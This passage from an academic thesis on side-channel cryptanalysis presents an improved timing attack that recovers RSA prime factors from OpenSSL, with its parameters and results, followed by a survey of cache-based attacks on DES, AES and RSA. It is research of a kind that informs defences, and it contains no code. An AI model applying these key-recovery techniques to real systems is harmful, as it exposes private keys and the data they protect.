terminate at either −D or D. However, the average number of steps should be smaller when qi = 0, because of the fact highlighted in equation (3.10). Consequently, if D and Nmax are chosen properly, a termination at D or −D is a strong indicator for qi = 0, whereas reaching Nmax without termination points that qi = 1. We use this strategy in our implementation and the results are presented in §7. We interpret our decision procedure as a classical gambler’s ruin problem. Formula (3.11) below facilitates the selection of suitable parameters D and Nmax . If fi;≥;k 6= 0.5 formula (3.4) in [36] (Chap. XIV Sect. 3 with z = D, a = 2D, p = fi;≥;k and q = 1 − p) yields the average number of steps (i.e., number of time differences to evaluate) until the process terminates at −D or D assuming Nmax = ∞. In fact, f 1 − ( fi;<;k )D 2D D i;≥;k − E(Steps) = fi;<;k − fi;≥;k fi;<;k − fi;≥;k 1 − ( fi;<;k )2D fi;≥;k (3.11) 44 Similarly, formula (3.5) in [36] yields E(Steps) = D2 if fi;≥;k = 0.5. (3.12) These formulae can be used to choose the parameter D and Nmax . A deeper analysis of the gambler’s ruin problem can be found in [36], Sect. XIV. The probabilities fi;≥;k vary with i and this fact makes the situation more complicated. On the other hand, if D and Nmax are chosen appropriately, the decision procedure should be robust against small changes of these probabilities. 3.4. Implementation Details We performed our attack against OpenSSL version 0.9.7e with disabled blinding, which would prevent the attack [71]. We implemented a simple TCP server and a client program, which exchange ASCII strings during the attack. The server reads the strings sent by the client, converts them to OpenSSL’s internal representation, and sends a response after decrypting them. The attack is actually performed by the client, which calculates the values to be decrypted, prepares and sends the messages, and makes guesses based on the time spent between sending a message and receiving the response. We used GNU Multi Precision arithmetic library, shortly GMP, to compute √ √ the square roots, i.e., b gc and b ghi c [40]. The source code was compiled using the gcc compiler with default optimizations. All of the experiments were run under the configuration shown in Table 3.1. We used random keys generated by OpenSSL’s key generation routine. We measured the time in terms of clock cycles using the Pentium cycle counter, which gives a resolution of 3.06 billion cycles per second. We used the “rdtsc” instruction available in Pentium processors to read the cycle counter and the “cpuid” instruction to serialize the processor. 45 Operating System: RedHat workstation 3 CPU: dual 3.06Ghz Xeon Compiler: gcc version 3.2.3 Cryptographic Library: OpenSSL 0.9.7e TABLE 3.1. The configuration used in the experiments Serialization of the processor was employed for the prevention of out-of-order execution in order to obtain more reliable timings. Serialization was also used by Brumley and Boneh in their experiments [21]. There are 2 parameters that determine the total number of queries required to expose a single bit of q. • Neighborhood size Nmax : We measure the decryption time in the neighborhoods of N (h; Nmax ) = {h, h+1, . . ., h+Nmax −1} and N (hhi ; Nmax ) = {hhi , hhi + 1, . . ., hhi + Nmax − 1} for each bit of q we want to expose. • Target difference D: The difference between the number of time differences that are less than zero and the number of time differences that are larger then zero. If we reach this difference among Nmax many timings, we guess the value of the bit as 0. Otherwise, our guess becomes as qi = 1. The total number of queries and the probability of an error for a single guess depend on these parameters. The sample size used by [21] is no longer a parameter in our attack. In the following section, we present the results of the experiments that explore the optimal values for these parameters. In our attack, we try to expose all of the bits of q between 5th and 245th bits. The first few bits are assumed to be able to determined by the same way as 46 new attack BB-Attack |∆|/N ∆BB /N interval bits = 0 bits = 1 0-1 gap bits = 0 bits = 1 0-1 gap [5, 31] 5871 3744 2127 3423 2593 830 [32, 63] 42778 4003 38775 15146 3455 11691 [64, 95] 40572 4310 36263 15899 3272 12627 [96, 127] 41307 3995 37313 18886 3580 15306 [128, 159] 45168 2736 42431 20877 2933 17945 [160, 191] 44736 3082 41654 24513 2479 22034 [192, 223] 37141 1755 35385 21550 1977 19573 [224, 245] 21936 2565 19371 27702 4728 22974 TABLE 3.2. Average ∆ and ∆BB values and 0-1 gaps. The values are given in terms of clock cycles. 47 in [21]. The remaining 11 bits after 245th bit can be easily found by using either an exhaustive search or BB-attack itself. 3.5. Experimental Results In this section we present the results of our experiments in four subsections. First, we compare our attack to BB-attack. Then, we give the details of our attack including error probability, parameters and the success rate in the following subsections. We also show the distribution of the time differences, which is the base point of our decision strategy. The characteristics of the decryption time may vary during the course of the attack, especially around the multiples of the machine word size. Therefore, we separated the bits of q into different groups, which we call intervals. The interval [i,j] represents all the bits between ith and j th bit, inclusively. In our experiments, we used intervals of 32 bits: [32,63], [64, 95], ...etc. All of the results we present in this paper were obtained by running our attack as an inter-process attack. It is stated in [21] that it is sufficient to increase the sample size to convert an inter-process attack into an inter-network attack. In our case, either a sample size can be used as a third parameter or the neighborhood size and the target difference can be adjusted to tolerate the network noise. 3.5.1. Comparison of our attack and BB-attack In [21], Brumley and Boneh calculated the time differences, denoted by ∆BB , for each bit to use as an indicator for the value of the bit. The gap between ∆BB when qi is 0 and when it is 1 is called the zero-one gap in [21]. Therefore, we want to compare both attacks in terms of zero-one gap. We run both attacks on 48 10 different randomly chosen keys and collected the time differences for each bit in [5, 245] using a neighborhood size of 5000 and a sample size of 1. Table 3.2 shows the average statistics of the collected values. The zero-one gap is 114% larger in our attack, which means a smaller number of queries are required to deduce a key in ours. 3.5.2. The details of our attack Our decision strategy for each single bit consists of: • Step 1: Sending the query for a particular neighbor and measuring the time difference ∆j . • Step 2: Comparing ∆j with zero and updating difference between the number of ∆j values that are less than zero and the number of ∆j values that are larger than zero. • Step 3: Repeating first 2 steps until we reach the target difference, D, or a maximum of Nmax times. • Step 4: Making the guess qi = 0, if the target difference is reached. Otherwise the guess turns out to be qi = 1. Note that we normally send only one query in Step 1, although we use a difference of two timings in our decision. This is because one of the timings we use to compute the difference has to be the one used for the decision of the previous bit. Since we halve the interval, which q is in, in each decision step, only one of the bounds, either the upper or lower one, will change. The timings for the bound that does not change can be reused during the decision process 49 . FIGURE 3.2. The distribution of ∆j in terms of clock cycles for 0 ≤ j ≤ 5000, sorted in descending order, for the sample bit q61 . The graph on the left shows this distribution when q61 = 1. The distribution on the right is observed when q61 = 0. of the next bit. Therefore sending one query for a particular neighbor becomes sufficient by storing the data of the previous iteration. Of course, there are some cases that we have to send both queries, specifically when we exceed the total number of neighbors used in the previous decision step. However, just removing the redundant queries, which can also simply be applied to BB-attack, almost doubles the performance. 3.5.2.1. The distribution of time differences We use the distribution of the time differences for our decision purposes. Whenever qi = 1, the number of time differences lay above and below zero is very close to each other. However, when qi = 0, the difference between these numbers becomes larger(see Figure 3.2). 50 interval max{fi;≥;0 , fi;<;0 } max{fi;≥,1 , fi;<,1 } [5, 31] 0.5315 0.5040 [32, 63] 0.6980 0.5097 [64, 95] 0.7123 0.5085 [96, 127] 0.7079 0.5079 [128, 159] 0.7300 0.5080 [160, 191] 0.7349 0.5090 [192, 223] 0.6961 0.5077 [224, 245] 0.6431 0.5194 TABLE 3.3. The percentage of the majority of time differences that are either positive or negative (empirical values) 3.5.2.2. Error probabilities and the parameters When qi = 1, approximately half of the time differences become positive and the other half become negative. If qi is 0, the majority of the time differences becomes either positive or negative. We determined the percentage of that majority in order to calculate the error probability for a single time difference. Table 3.3 shows estimators for max{fi;≥;0 , fi;<;0 } and max{fi;≥,1 , fi;<,1 }. These statistics were obtained using 10 different keys and a neighborhood size of 50000 for [5, 31] and 5000 for other intervals. The empirical parameters that yield the intended error probabilities are shown in Table 3.4. We present three different sets of parameters for each accuracy of 95%, 97.5%, and 99%. We used these parameters to perform our attack on several different keys. Note that inserting the values of Table 3.3 into formula 51 (3.11) yields the expected values E(Steps) for qi = 0 and qi = 1, resp. The probabilities for correct guesses (95%, 97.5%, 99%) were gained empirically. We employed the concept of ‘confirmed intervals’ (refer to Section 3.1) to detect the errors occured during the attack. We could recover such errors using the same concept and could expose each bit of q in the interval [5, 245] of any key we attacked. Brumley and Boneh used 1.4 million queries in [21] (interprocess attacks) and they indicated that their attack required nearly 359000 queries in the more favourable case when the optimizations were turned off by the flag (g). We could perform our attack with as low as 47674 queries for a particular key. The performance of these timing attacks are highly environment dependent, therefore it is not reliable to compare the figures of two different attacks on two different systems. Despite this fact, it is obvious by the arguments explained above (improving the signal-to-noise ratio (cf. also Table 3.2), reusing previous queries, sequential sampling) that our attack is significantly better than the previous one. We performed interprocess attacks. Clearly, in network attacks the noise (caused by network delay times) may be much larger, and hence an attack may become impractical even if it is feasible for an interprocess attack under the same environmental conditions. However, this aspect is not specific for our improved variant but a general feature that affects BB-attack as well. 3.6. Conclusion We have presented a new timing attack against unprotected SSL implementations of RSA-CRT. Our attack exploits the timing behavior of Montgomery multiplications performed during table initialization phase of the sliding window exponentiation algorithm. It is an improvement of Brumley and Boneh attack, 52 Accuracy = 95% Accuracy = 97.5% Accuracy = 99% parameters E(Steps) for parameters E(Steps) for parameters E(Steps) for interval D Nmax qi = 0 qi = 1 D Nmax qi = 0 qi = 1 D Nmax qi = 0 qi = 1 [5, 31] 63 1850 1975 1077 4220 230 6720 3646 27480 [32, 63] 25 131 63 579 29 163 73 761 34 240 85 1012 [64, 95] 17 67 40 281 36 192 84 1154 46 450 108 1767 [96, 127] 18 70 43 315 26 130 62 640 44 250 105 1674 [128, 159] 16 50 34 250 31 271 67 889 41 299 89 1477 [160, 191] 21 107 44 421 25 127 53 585 29 169 61 [192, 223] 24 126 61 551 36 264 91 1179 49 333 124 2033 [224, 245] 30 230 104 636 31 259 365 150 1032 998 3667 68 108 667 43 TABLE 3.4. Columns 2 and 3 show the parameters that can be used to yield the intended accuracy. The last columns give the expected number of steps for Nmax = ∞, calculated using Formula (3.11), to reach the target difference D. 771 53 which exploits Montgomery multiplication in the exponentiation phase of the same algorithm. Changing the target phase of the attack yields an increase on the number of multiplications that provide useful information to expose one of the prime factors of RSA moduli. Only this change alone gives an improvement by a factor of more than 5 over BB-attack. We have also presented other possible improvements, including employing sequential analysis for the decision purposes and removing the redundant queries that can also be applied to BB-attack. If we use only the idea of removing redundant queries from BB-attack, this will double the performance by itself. Our attack brings an overall improvement by a factor of more than 10. 54 4. SURVEY ON CACHE ATTACKS As we mention earlier in this document, traditional cryptography considers cryptosystems as perfect mathematical models and deals only with these models. However, any cryptosystem needs an implementation and a physical device to run on. The implementations of cryptosystems may leak information through so-called side channels due to the physical requirements of the device, e.g., power consumption, electromagnetic emanation and/or execution time. In this chapter, we focus on a specific type of side-channel attacks that takes advantage of the information which leaks through the cache architecture of a CPU. To be more precise, we describe cache-based attacks in the literature. Timing attacks on various cryptosystems, including RSA and DiffieHellman, were introduced in 1996 by Kocher [59]. Several papers have been published on the subject since then, e.g., [34, 85, 21, 6]. In 1999, Koeune and Quisquater developed a timing attack on a careless implementation of AES [61], which has significantly been improved in [88]. A timing attack against RSA on a smart card was developed in [34]. Various timing attacks were significantly improved or discovered by employing formal statistical models and efficient decision strategies in [85, 6, 88, 87, 89, 86]. All of the timing attacks mentioned above exploit the variations in execution time caused by running different execution paths due to the conditional branches, e.g., due to the extra reduction step of Montgomery Multiplication (c.f. Sections 2.1.3, 3.1, 3.2, and 3.3). However, it is still possible to attack an implementation even if the execution path is always same. A cache-based attack, abbreviated to “cache attack” from here on, exploits the cache behavior of a cryp- 55 tosystem by obtaining the execution time and/or power consumption variations generated via cache hits and misses. The feasibility of the cache attacks was first mentioned by Kocher and then Kelsey et al. in [59, 54]. Page described and simulated a theoretical cache attack on DES [75]. The first actual cache attacks were implemented by Tsunoo et al. [101, 100]. The main focus of those papers was on DES [20]. Tsunoo et al. claimed that the search space of the AES key could be narrowed to 32 bits using cache attacks; however they did not detail their attack. Bernstein showed the vulnerability of AES by performing a cache attack on OpenSSL AES implementation [14]. The attack he developed is a template attack [24] and requires prior knowledge of the timing behavior of the cipher under the same known key on an identical platform. In this sense, his attack is not very practical, because the required information is not directly available to an attacker. Efficient cache attacks on AES were presented by Osvik et al. in [72, 73]. They described and simulated several different methods to perform local cache attacks. They made use of a local array, and exploited the collisions between AES table lookups and the accesses to this array. None of their methods can be used as a remote attack, e.g., an attack over a local network, unless the attacker is able to manipulate the cache remotely. None of the mentioned papers, except [14], considered whether a remote cache attack is feasible. Although Bernstein claimed that his attack revealed the key of a remote cryptosystem, his experiments were purely local [14]. The server received the messages, processed them and sent the exact execution time to the attacker client in his attack model. Therefore, there were neither transmission delays nor network stack delays in the measurements. 56 Despite of Bleichenbacher’s attack ( [16]), which exploited weak implementations of the SSL handshake protocol, the vulnerability of software systems against remote timing attacks was not known until Brumley and Boneh performed an attack over a local network in ( [21]). They mimicked the attack introduced in [85] to show that the RSA implementation of OpenSSL [71], which is the most widely used open-source crypto library, was not immune to such attacks at that time. An improved version of this attack is introduced in [6] and also given in Section 3.3. In this chapter, we give more details of the cache attacks mentioned above. 4.1. The Basics of a Cache Attack A cache is a small and fast storage area used by the CPU to reduce the average time to access main memory (c.f. Section 2.3.1). Cryptosystems have data-dependent memory access patterns. Cache architectures leak information about the cache hit/miss statistics of ciphers through side channels, e.g., execution time and power consumption. Therefore, it is possible to exploit cache behavior of a cipher to obtain information about its memory access patterns, i.e. indices of S-box and table lookups. Cache attacks rely on the cache hits and misses that occur during the encryption / decryption process of the cryptosystem. Even if the same instructions are executed for any particular (plaintext, cipherkey) pair, the cache behavior during the execution may cause variations in the program execution time and power consumption. Cache attacks try to exploit such variations to narrow the exhaustive search space of secret keys. 57 Theoretical cache attacks were first described by Page in [75]. Page characterized two types of cache attacks, namely trace-driven and time-driven. In trace-driven attacks, the adversary is able to obtain a profile of the cache activity of the cipher. This profile includes the outcomes of every memory access the cipher issues in terms of cache hits and misses. Therefore, the adversary has the ability to observe (e.g.) if the 2nd access to a lookup table yields a hit and can infer information about the lookup indices, which are key dependent. This ability gives an adversary the opportunity to make inferences about the secret key. Time driven attacks, on the other hand, are less restrictive since they do not rely on the ability of capturing the outcomes of individual memory accesses. Adversary is assumed to be able to observe the aggregate profile, i.e., total numbers of cache hits and misses or at least a value that can be used to approximate these numbers. For example, the total execution time of the cipher can be measured and used to make inferences about the number of cache misses in a time-driven cache attack. Time-driven attacks are based on statistical inferences, and therefore require much higher number of samples than trace-driven attacks. We have recently seen another type of cache attacks that can be named as “access-driven” attacks. In these attacks, the adversary can determine the cache sets that the cipher process modifies. Therefore, he can understand which elements of the lookup tables or S-boxes are accessed by the cipher. Then, the candidate keys that cause an access to unaccessed parts of the tables can be eliminated. In the rest of this section, we present the basic models of cache attacks. The attacks in the literature are built upon these models. 58 . FIGURE 4.1. Cache Attack Model-1 4.1.1. Basic Attack Models In this subsection we present two different models that are employed in various cache attacks in the literature. The first model mainly corresponds to access-driven cache attacks, while the second model is the basic model of timedriven and trace-driven attacks. 4.1.1.1. Model-1 We use Figure 4.1 to explain this attack model. We have a main memory that stores data of each process running on the system and a cache between the memory and the CPU. Each square in the cache represents a cache block and each column represents a different cache set. For example, this cache has 2 blocks in each column, so it is 2-way set associative. The blocks in a column of the memory map only to the corresponding cache set in the same column of the cache. Mapping a memory block to a cache set means that this particular cache block can only be stored in that set of the cache. As an example, the garbage data and data structure 1 can only be in the dark area of the cache in Figure 4.1. 59 Assume that we have two different processes, the cryptosystem and a malicious process, called Spy process, running on the same machine. Cryptosystem process contains different internal data structures and it accesses some or all of these data structures, depending on the value of the secret key. The adversary can easily understand if the cipher has at least one access to data structure 1 during an encryption, because accesses to garbage data and data structure 1 creates external collisions. A collision is the situation that occurs when an attempt is made to store two or more different data items at a location that can hold only one of them. We use the term “external collision” if these data items belong to different processes. On the other hand, if the data items are of the same process, we call this situation as “internal collision”. In our case, the cache cannot store the garbage data and data structure 1 at the same time, so an access to the garbage data may evict data structure 1 from the cache and vice versa. This fact enables an adversary to devise an attack on the cryptosystem process as follows. When the adversary reads the garbage data, CPU loads the content of it into the cache (Figure 4.2a). If the cryptosystem is run under this initial cache state, there are two possible cases: 1. Case: Data structure 1 is accessed by the cipher. 2. Case: Data structure 1 is not accessed by the cipher. In Case 1 (Case 2, resp.) the final state of the first four cache sets just after the encryption becomes like Figure 4.2b (Figure 4.2c, resp.). In the first case, the cipher accesses data structure 1 and this access changes the content of the first four cache sets as shown in the figure. Otherwise, these sets remain unchanged. When 60 . FIGURE 4.2. Cache states the adversary reads the garbage data again after the encryption, he can understand which case was true, because reading the garbage data creates some cache misses and thus takes longer in Case 1. Similarly, at least in theory, the adversary can use the same technique for other data structures and reveal the entire set of items that are accessed during an encryption. Since this set depends on the secret key value, he can gain invaluable information to narrow the exhaustive search space. This model describes an active attack where the adversary must be able to control the content of the cache. The cache attacks rely on this basic model corresponds to access-driven types. Percival’s attack on RSA [80](c.f. Subsection 4.2.4), OST and Neve et. al.’s attacks on AES [72, 73, 67] (c.f. Subsections 4.2.5 and 4.2.6) and the power attack by Bertoni et al. [15] (c.f. Subsection 4.2.7) use this attack model. 61 4.1.1.2. Model-2 Assume there are two accesses to the same table as in Figure 4.3. Let Pi and Ki be the ith byte of the plaintext and cipherkey, respectively. In this paper, each byte is considered to be either an 8-digit radix-2 number, i.e., {0, 1}8 , that can be added together in GF(28 ) using a bitwise exclusive-or operation or an integer in [0, 255] that can be used as an index. For the rest of this paper, we assume that each plaintext consists of a single message block unless otherwise stated. The size of the message block depends on the particular cryptosystem in use, e.g. it is 128, 192, or 256 bits for AES, 64 bits for DES, and usually 512 or 1024 bits for RSA. The structure shown in the figure uses different bytes of the plaintext and the cipherkey as inputs to the function that computes the index of each of these two accesses. If both of them access to the same element of the table, the latter one will find the target data in the cache and result a cache hit; therefore requires a shorter execution time. Then, the key byte difference K1 ⊕ K2 can be derived from the values of plaintext bytes P1 and P2 using the equation: P 1 ⊕ K1 = P 2 ⊕ K 2 ⇒ P 1 ⊕ P 2 = K1 ⊕ K2 . In trace-driven attacks, we already assume that the adversary can directly understand if the latter access results a hit, thus can directly obtain K1 ⊕ K2 . This goal is more complicated in time-driven attacks. We need to use a large sample to realize an accurate statistics of the execution. In our case, if we collect a sample of different plaintext pairs with the corresponding execution time, the plaintext byte difference, P1 ⊕ P2 , that causes the shortest average execution 62 . FIGURE 4.3. Two different accesses to the same table. time will give the correct key byte difference assuming a cache hit decreases the overall execution time. However, in a real environment, even if the latter access is to a different element other than the exact target of the former access, a cache hit may still occur. Any cache miss results the transfer of an entire cache line, not only one element, from the main memory. Therefore, if the former access has a target, which lies in the same cache line of the previously accessed data, a cache hit will occur. In that case, we can still obtain the key byte difference partially as follows: Let δ be the number of bytes in a cache line and assume that each element of the table is k bytes long. Under this situation, there are δ/k elements in each line, which means any access to a specific element will map to the same line with (δ/k − 1) different other accesses. If two different accesses to the same array read the same cache line, the most significant parts of their indices, i.e., all of the bits except the last ` = log2 (δ/k) bits, must be identical.1 Using this fact, we can find 1 We assume that lookup tables are aligned in the memory, which is the case most of the time. If they are not aligned, this will indeed increase the performance of the attack as mentioned in [73]. 63 the difference of the most significant part of the key bytes using the equation: hP1 i ⊕ hP2 i = hK1 i ⊕ hK2 i , where hAi stands for the most significant part of A. Indices of table lookups are usually more complex functions of the plaintext and the cipherkey than only bitwise exclusive-or of their certain bytes. The structure of these functions determines the performance of the attack, i.e., the amount of reduction in the exhaustive search space. The basic idea presented above can be adapted to any such function in order to develop successful attacks. Let f1 (P, K 0 ) and f2 (P, K 00 ) be two different functions that specify the indices of two different accesses to the same table, where K 0 and K 00 are certain parts of the same cipherkey. • If hf1 (P, K 0 )i = hf2 (P, K 00 )i (4.1) for each plaintext in a large sample, then the expected timing characteristics of this set, e.g., median or average execution time, will be different than that of a random sample. When we consider this fact, a simple attack method becomes the following: 1. Phase 1: Obtain a sample of N (plaintext, encryption time) pairs generated under the same target key. f0 and K f00 stand 2. Phase 2: Perform an exhaustive search on K 0 and K 00 . Let K for the candidate values of K 0 and K 00 , respectively. Divide the entity of all (plaintext, encryption time) pairs into different sets, one for each candidate f0 , K f00 ), and put all plaintexts in this set that satisfy equation 4.1 pair (K 64 f0 , K f00 ). Note that these sets need not be mutually disjoint, i.e., a for (K f0 , K f00 ) values in particular plaintext may obey equation 4.1 for different (K which case it will be an element of all of these sets (one set for each different f0 , K f00 ) value). (K 3. Phase 3: Obtain the timing characteristics of each set. If all of these characteristics, except one, is very similar to each other, the one with the different f0 = K 0 characteristics has to be the set of the correct candidates, i.e., when K f00 = K 00 . and K 4.2. Cache Attacks in the Literature In this section we summarize the cache attacks in the literature. Our own attacks are only briefly mentioned in this chapter and described in the next chapters in detail. 4.2.1. Theoretical Attack of D. Page D. Page described and simulated a theoretical trace-driven cache attack on DES [75]. We do not present the details of DES algorithm [20] in this document, but we give the necessary information to understand the basic idea of this attack. In DES, there are 16 rounds of computations and 8 different S-boxes. In every round, there is an access to each of these 8 S-boxes as shown in Figure 4.4. The indices used in first two rounds are given below: I0 = K0 ⊕ E(R0 ) I1 = K1 ⊕ E(L0 ⊕ P (S(K0 ⊕ E(R0 )))) , 65 . FIGURE 4.4. DES S-Box lookup. where E is the expansion function and P is the permutation function. These functions are reversable (injective), i.e., given the output, the inputs of these functions can be calculated. S is the function implemented in S-boxes. R0 and L0 are the right and left halves of the input plaintext after the application of the initial permutation. K0 and K1 are the round keys derived from the actual key, K. If the adversary can capture the profile of the cache activity during the second round, i.e., the outcomes of S-box lookups using index I1 , then he can correlate I0 and I1 . From this correlation, he can partially recover the bits of K0 and K1 , thus some bits of the actual key. The reader should notice that the values of R0 and L0 are known by the adversary, i.e. it is a known or chosen plaintext attack. More details of the attack can be found in the original paper [75]. This attack is hypothetical, because Page just assumed that it was possible to capture the cache profile and did not explain how. Later, Bertoni et al. and Lauradoux showed that it was possible to capture the cache traces of a cryptosystem using power analysis [15, 62], c.f. Sections 4.2.7 and 4.2.8. Page’s attack requires capturing 210 encryption profiles to reduce the search space from 256 bits to 232 bits. Page also discussed possible countermeasures against cache attacks in [75, 76, 80]. 66 4.2.2. First Practical Implementations Cache attacks were first implemented by Tsunoo et al. [101, 100]. These attacks are time-driven cache based timing attacks built upon the last attack model described above. Tsunoo et al. developed different attacks on various ciphers, including MISTY1 [101, 63], DES and Triple-DES [100, 20]. The original attack on MISTY1 proposed in [101] is improved later in [102]. In this paper, we only describe the attack on DES. Their attack focuses on the indices of first and last round S-box lookups. The adversary collects a sample of plaintext and the corresponding encryption times and analyzes this data to find correlations between first and last round S-box indices, considering each of 8 S-boxes, S0 through S7. From the correlations found, he can make partial inferences about the secret key. Note that this attack employs statistical inferences, and thus its success is probabilistic. Their experiments show that collecting 223 known plaintext reduces the search space down to 224 bits with a success rate of higher than 90%. 4.2.3. Bernstein’s Attack Bernstein showed the vulnerability of AES by performing a cache attack on OpenSSL’s AES implementation [14]. The attack he developed is a template attack [24] and requires prior knowledge of the timing behavior of the cipher under the same known key on an identical platform. There are different phases of this attack. In the first phase, profiling or learning phase, the attacker establishes the profiles of the execution time of the cipher under known secret keys. To establish such profiles, it is necessary to know the value of the test keys and simulate the execution of the cipher for a sample of 67 known plaintext on a platform exactly identical to the server. Even the software installed on the target and test platforms need to be same [68, 66]. After establishing each profile, the attacker can apply the actual attack to the server. He sends random plaintext to the server and measures the encryption time of each plaintext. Doing so, he can establish the profile of the actual secret key. Then he can find correlations of the actual profile and the profiles captured during the profiling phase, each profile typical for a particular subkey. From these correlation, he tries to predict the parts of the secret key or a set of candidate keys. He can find the actual key using a brute-force attack on the narrowed search space. Bernstein showed the vulnerability of AES software implementations on various platforms [14]. There was a common belief that Bernstein’s attack is a realistic remote attack and it can recover an entire AES key. However, Neve et al. showed in [68] that this is only a fallacy. They described the circumstances in which the attack might work and also the limitations of the Bernstein attack. The details of this analysis can also be found in [66]. 4.2.4. Percival’s Hyper-Threading Attack on RSA Colin Percival developed a noteworthy cache attack on OpenSSL’s implementation of RSA [82], which is the most widely used public-key cryptosystem. This attack is built upon the first attack model presented above (cf. Subsection 4.1.1.1). In Subsection 4.1.1.1, we describe a general attack model that can work in almost any environment. But, such attacks become very powerful especially on simultaneous multithreading environments, because the adversary can run the 68 malicious process, i.e., Spy process, simultaneously with the cipher. Running these processes simultaneously allows an attacker to obtain not only the set of data structures accessed by the cipher but also the approximate time that each access occurs. In Percival’s attack, we run a spy process simultaneously with the server. This process continuously reads each cache set in the same order and measures the read time of each of these cache sets as long as the cipher process operates. If reading a cache set takes longer, the attacker can conclude that this set was accessed during the time interval between the last read of the set by the spy process and the current read. In this sense, it is a combined trace-driven and access-driven cache attack. This attack reveals the ‘footprints’ of a process, i.e., the steps that this process follows. In case of RSA, Percival was able to identify the order of squaring and multiplication operations in OpenSSL’s implementation that employs sliding windows exponentiation with a window size of 5 bits. The known sequence of these operations gives 200 bits of information about each of the two 512-bit secret exponents. If it is also possible to distinguish each multiplier, based on the cache sets they map to, then the adversary can directly obtain the value of both exponents. The same attack can straightforwardly recover the exponents, if square and multiply exponentiation is used in the implementation. 4.2.5. Osvik-Shamir-Tromer (OST) Attacks Osvik, Shamir, and Tromer used a similar idea to attack AES [73]. They described and simulated several different methods to perform local cache attacks. They make use of a local array and exploit the collisions between AES table 69 lookups and the accesses to this array. None of their methods can be used as a remote attack, e.g. an attack over a local network, unless the attacker is able to manipulate the cache remotely. In their attack model, the adversary reads the garbage data to load it into the cache, waits for someone else to start encryption, and after the encryption he reads the garbage data again to find the cache sets accessed by AES process. Clearly, this attack is very similar to the model in Subsection 4.1.1.1 and it is an access-driven attack. In OST attack, the adversary analyzes the cache sets that are accessed during the first two rounds of AES and predicts the table lookup indices. Then, he recovers the key with the knowledge of these indices. This attack is very efficient and requires only 300 encryptions on AMD Athlon and 16000 encryptions on Pentium 4. 4.2.6. Last Round Access-Driven Attack Osvik et al.’s access-driven attack considers the access of the first two AES rounds. Neve et al. improved this attack by taking the last round accesses into consideration. The most widely used AES implementation employs a single lookup table, called T4, for the last round computations (c.f. Section 2.2.2). The adversary completely evicts T4 from the cache by reading a local array before an AES computation as done in [73] (c.f. Sections 4.2.5 and 4.1.1.1). After the AES execution, he determines which data blocks of T4 are accessed by the cipher. Then he eliminates the values that cannot be the correct value of the last round key bytes with the knowledge of unaccessed data blocks and the ciphertext value. 70 The adversary continues to apply this elimination method by collecting data from other AES executions until he finds the correct round key. This attack is calculated to require less than 13 encryptions in average in a ideal environment to break AES on the systems that have a cache line size of 64 bytes. 4.2.7. Cache-based Power Attack on AES from Bertoni et al. Bertoni et al. devised a cache based power attack on AES that can theoretically break the cipher with 512 encryptions [15]. They realized that cache misses are easily observable through power analysis at least in a simulation environment. In this attack, the adversary is assumed to know the exact location of AES Sbox, the exact implementation, and the details of the cache architecture, i.e., cache size, block size, and associativity. He first triggers the AES computation to load Sbox into the cache. Then, he evicts a particular Sbox entry from the cache and runs AES again, but this time he also measures the power consumption of the execution. If AES accesses to this particular entry during the computation, the adversary can detect if and when it happens. Therefore, he can understand which Sbox lookup causes an access to that particular entry. Performing the same method with each Sbox entry allows the adversary to determine the indices of the AES lookups. Bertoni et al. tested their attack in a simulation environment using Simplescalar-3.0 toolset [11, 22] and Power Analyzer [55], a library for power modelling that can be integrated in Simplescalar. We want to mention that their attack is theoretical because they did not consider the details of practical issues that arouse in an actual attack. 71 4.2.8. Lauradoux’s Power Attack on AES Another cache power attack is from Lauradoux [62]. He presented a cache attack on AES, which exploits the internal cache collision instead of the external collisions that were used in Bertoni et al.’s attack. This attack analyzes the power consumption of the AES execution to detect the occurences of internal collisions during the first AES round. This knowledge allows an adversary to reveal the values of certain key byte differences and immediately reduces the exhaustive search space from 128 bits to 80 bits. The basic underlying idea presented in [62] is similar to our first round attack (c.f. Section 5.2.1). 4.2.9. Internal Cache Collision Attacks by Bonneau et al. Bonneau et al. documented possible internal collision based time-driven cache attacks in [18]. The experimental results show that their most effective attack, which considers the collisions occur during the last round of AES, requires between 213 and 220 encryptions to break the cipher. This last round attack requires the least number of encryptions among all of the time-driven cache attacks presented above. 4.2.10. Overview of Our Cache Attacks Although the results presented in [18] seem to be low, they do not reflect actual situations. Bonneau et al.’s experiments, along with those given in [14], are conducted in a hypothetical environment without considering the realistic scenarios. In all of these experiments, the AES encryption is executed via a function call and the execution time of this internal AES function is measured 72 and used in the analysis. However, in a real attack, there is no way that an adversary can execute inside his own process an AES cipher that operates with secret key owned by someone else. The cipher and the attack tool have to be different unrelated processes running on the same or different machines connected via a network. Therefore, an actual attack suffers from measuremental noise due to network delays, stack delays, and such. Although, the findings of [14, 18, 100] indicate the feasibility of these cache attacks on real security systems in principal, they do not give the computational requirements and prove the practicality of actual attacks. There are many studies on cache attacks in the literature and many attempts to develop a remote cache attack that can reveal a key on a server running over a network. Despite of some inaccurate claims on remote cache attacks being able to devised, which were proven to be wrong eventually, none of these efforts was successful to achieve the ultimate goal of developing a generic and universally applicable cache attack that can also compromise remote systems. We show how one can devise and apply such a remote cache attack in the next chapter. We present those ideas in [5] and show how to use them to develop a universal remote cache attack on AES. Our results prove that cache attacks cannot be considered as pure local attacks and they can be applied to software systems running over a network. Furthermore, in Chapter 6, we analyze trace-driven cache attacks, which are one of three types of cache attacks identified so far. We construct an analytical model for trace-driven attacks that enables one to analyze such attacks on different implementations and different platforms [3, 4]. We also develop very efficient trace-driven attacks on AES and apply our model on those attacks as a case 73 study. We show that trace-driven attacks have more potential than what is stated in previous works. 74 5. CACHE BASED REMOTE TIMING ATTACK ON THE AES All of the cache attacks presented in the previous chapter, except [14], either assume that the cache does not contain any data related to the encryption process prior to each encryption or explicitly force the cache architecture to replace some of the cipher data. The implementations of Tsunoo et al. accomplish the so-called ‘cache cleaning’ by loading some garbage data into the cache to clean it before each encryption [100, 101]. The need of cleaning the cache makes an attack impossible to reveal information about the cryptosystems on remote machines, because the attacker must have an access to the computer to perform cache cleaning. They did not investigate if their attacks could successfully recover the key without employing explicit cache cleaning on certain platforms. Attacks described in [73] replace the cipher data on the cache with some garbage data by loading the content of a local array into the cache. Again, the attacker needs an access to the target platform to perform these attacks. Therefore, none of the mentioned studies could be considered as practical for remote attacks over a network, unless the attacker is able to manipulate the cache remotely. In this chapter, we present a robust effective cache attack, which can be used to compromise remote systems, on the AES implementation described in [31] for 32-bit architectures. Although our basic principles can be used to develop similar attacks on other implementations, we only focus on this particular implementation stated above and described in Section 2.2.2. We show that it is possible to apply a cache attack without employing cache cleaning or explicitly aimed cache 